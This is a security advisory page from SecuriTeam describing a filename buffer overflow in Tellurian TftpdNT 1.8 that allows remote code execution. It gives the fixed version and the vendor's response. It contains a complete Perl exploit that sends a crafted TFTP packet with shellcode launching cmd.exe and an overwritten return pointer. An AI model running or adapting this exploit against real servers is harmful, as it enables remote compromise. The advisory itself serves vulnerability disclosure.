Security Vulnerability in Tellurian TftpdNT (Long Filename)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Home
Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

Confidence 2013

5% Off any SANS course
Use Code: SecuriTeam_5

Hack In Paris

La Nuit du Hack

Subjects of Interest:
Vulnerability Management
SQL Injection
Buffer Overflows
Active Network Scanning
Fuzzing
Fuzzer Report
Network Security
Network Scanner
Pen Testing
Security Scanner

Tellurian TftpdNT is a TFTP server for Windows NT and Windows 9x.
A buffer overflow vulnerability in the product allows remote attackers to cause the product to overflow an internal buffer, while executing arbitrary code.

Credit:
SecurITeam would like to thank STORM for finding this vulnerability.

Free Website Security Scan	Free Fuzzer Report	Vulnerability Assessment
Detect web app vulnerabilities	University study comparing the top	Accurate and automated scanning
Get guidance from professionals.	6 commercially availble fuzzers.	for networks of any size.

Protect your website!
Free Trial, Nothing to install.
No interruption of visitors.
www.beyondsecurity.com/vulnerability-scanner

Vulnerable systems:
* TftpdNT version 1.8

Immune systems:
* TftpdNT version 2.0

It is possible to cause a buffer overflow in the Tellurian TftpdNT product, while overwriting the EIP pointer - this allows remote command execution.
The overflow occurs in the product's parsing of the filename.

Vendor status:
The vendor has been informed, and has fixed the issue within 24 hours. A new version is available on the web site.

Exploit:
#!/usr/bin/perl -w
#Tellurian TFTP Server buffer overflow vulnerability

use IO::Socket;
$host = "192.168.1.44";
$port = "69";

$shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\
\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\
\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\
\x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F";

$buf = "\x00\x02";
$buf .= "\x41"x(508-length($shellcode));
$buf .= $shellcode;
$buf .= "\x0F\x02\xC7"; # EIP
$buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00";

print "Length: ", length($buf), "\n";

$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
$@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
print "Done\n";

blog comments powered by Disqus

	Microsoft Windows USB Driver Memory Object Handling Local Privilege (2013-1287) Vulnerability
	Microsoft IE SaveHistory Onload Event Handling Use-After-Free Arbitrary Code Execution Vulnerability
	Microsoft IE CMarkupBehaviorContext Use-After-Free Arbitrary Code Execution Vulnerability
	Microsoft SharePoint XSS Vulnerability
	Microsoft IE OnBeforeCopy Use-After-Free Arbitrary Code Execution Vulnerability
	Microsoft Windows USB Driver Memory Object Handling Local Privilege Escalation Vulnerability
	Microsoft OneNote Buffer Size Validation ONE File Handling Information Disclosure Vulnerability
	Microsoft IE GetMarkupPtr execCommand Print Event Handling Use-after-free Execution Vulnerability
	Microsoft SharePoint Remote Overflow DoS Vulnerability
	Microsoft IE CTreeNode Use-After-Free Arbitrary Code Execution Vulnerability
	Microsoft Windows USB Driver Memory Object Handling Local Privilege (2013-1286) Vulnerability
	Microsoft IE CTreeNode Use-After-Free Use-After-Free Arbitrary Execution Vulnerability
	Microsoft IE Proxy Server TCP Session Re-Use Cross-User Information Disclosure Weakness Vulnerability
	Microsoft IE Shift JIS Character Encoding Information Disclosure Vulnerability
	Microsoft IE SetCapture Use-after-free Arbitrary Code Execution Vulnerability
	Microsoft IE Vector Markup Language (VML) Buffer Allocation Memory Corruption Vulnerability
	Microsoft Windows Kernel Memory Object Handling Local Privilege Escalation Vulnerability
	Microsoft System Center Operations Web Console XSS Vulnerability
	Microsoft Lync User-Agent Header Handling Remote Arbitrary Command Execution Vulnerability
	Microsoft System Center Operations Manager Web Console XSS Vulnerability

Featured Articles

	Microsoft Windows USB Driver Memory Object Handling Local Privilege (2013-1287) Vulnerability
	Microsoft Windows USB Driver Memory Object Handling Local Privilege Escalation Vulnerability
	Microsoft Windows Kernel Memory Object Handling Local Privilege Escalation Vulnerability
	Microsoft Windows SSL/TSL Forced Downgrade MitM Weakness
	Microsoft Windows Memory Object Handling Local Memory Privilege Escalation Vulnerability
	Microsoft Windows Privilege Escalation Vulnerability
	Microsoft .NET Framework Serialization Remote Code Execution Vulnerability
	Microsoft Visio Viewer VSD File Format Remote Code Execution Vulnerability
	Microsoft .NET Framework Input Serialization CVE-2012-0160 Remote Code Execution Vulnerability
	Microsoft .NET Framework ASP.NET Forms Authentication Bypass Vulnerability
	'TrendMicro Control Manager CASProcessor.exe BLOB Code Execution Vulnerability'
	'HP iNode Management Center iNodeMngChecker.exe Code Execution Vulnerability'
	'HP Data Protector Backup Client Service EXEC_SCRIPT Code Execution Vulnerability'
	'Microsoft Internet Explorer Property Change Memory Corruption Vulnerability'
	'Microsoft Office PowerPoint PersistDirectoryEntry Code Execution Vulnerability'
	'CA Total Defense Suite Heartbeat Web Service Code Execution Vulnerability'
	'HP Web Jetadmin Unauthorized Access to Managed Resources Vulnerability'
	'Novell Zenworks Handheld Management ZfHIPCnd.exe Opcode 2 Code Execution Vulnerability'
	'Microsoft Windows Shell Graphics biCompression Buffer Overflow Vulnerability'
	'Microsoft Office PICT Filter Integer Truncation Vulnerability'

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs